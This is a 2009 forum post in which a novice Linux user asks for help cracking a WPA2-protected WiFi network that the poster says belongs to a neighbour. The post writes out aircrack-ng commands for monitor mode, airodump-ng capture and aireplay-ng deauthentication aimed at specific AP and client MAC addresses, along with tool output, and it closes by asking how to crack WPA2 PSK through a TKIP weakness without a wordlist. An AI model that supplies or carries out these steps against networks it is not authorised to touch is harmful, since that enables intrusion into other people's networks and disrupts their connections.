I'm tring to crack a WPA2 protected WiFi. I've red lots of "manuals" and explanation about the argument but I'm little disable at using Linux (now I'm running my Intrepid Ubuntu =) )
I meet any problem...I'll try to explain me better I can but if something is difficult 2 understand please post and I'll try to answer the questions.
Ok. It's what I've done (wlan0 is my WiFi iface)
Is the same thing than use airmon-ng? I've red the man of airmon-ng but it only say that u can use this script for bring the wireless device (wlan0) into monitor mode.
$ sudo su
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
ok now airodump is listening from wlan0.
airodump-ng -w fra --channel 11 wlan0 (11 is the channel of the AP...seen before using airodump-ng)
Into the airodump window nothing happened! I still tried to do it but, from what I can see, the injecition fail.
$ sudo aireplay-ng --deauth 1 -a 00:13:c8:cc:22:** -c 00:17:c4:76:30:** wlan0
17:35:37 Sending DeAuth to station -- STMAC: [00:17:C4:76:30:**]
What does it mean? Maybe the client is too far? Looking at airodump i can see his MAC but sometime there are lost packets.
$ sudo aireplay-ng --test wlan0
18:04:01 Trying broadcast probe requests...
18:04:02 No Answer...
18:04:02 Found 1 AP
18:04:02 Trying directed probe requests...
18:04:02 00:13:C8:CC:22:B3 - channel: 11 - 'Broadcom'
18:04:11 0/30: 0%
I can't understand why the injection fail and i don't see the WPA-handShake.I've tried to send 10 consecutives deauthentication packets but nothing! >.<
Maybe the WiFi of the naeghtboor in unrackable? It's WPA2..
Waiting for response =)
ps: here you are a report of what i can see in the airodump-ng page
CH 11 ][ Elapsed: 4 hours 25 mins ][ 2009-12-27 21:48
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:13:C8:CC:22:B3 -1 83 126192 690 3 11 48 WPA2 CCMP PSK Broadcom
00:0C:F6:50:D2:17 -1 0 1225 0 0 11 54. WPA2 Sitecom50D217
BSSID STATION PWR Lost Packets Probes
00:13:C8:CC:22:B3 00:17:C4:76:30:9C -1 1676 10923 Broadcom
Anyone know how to crack the WPA2 PSK using the TKIP bug?I've read anything about a way to crack the TKIP protocol without using a WordList...Anyone can help me?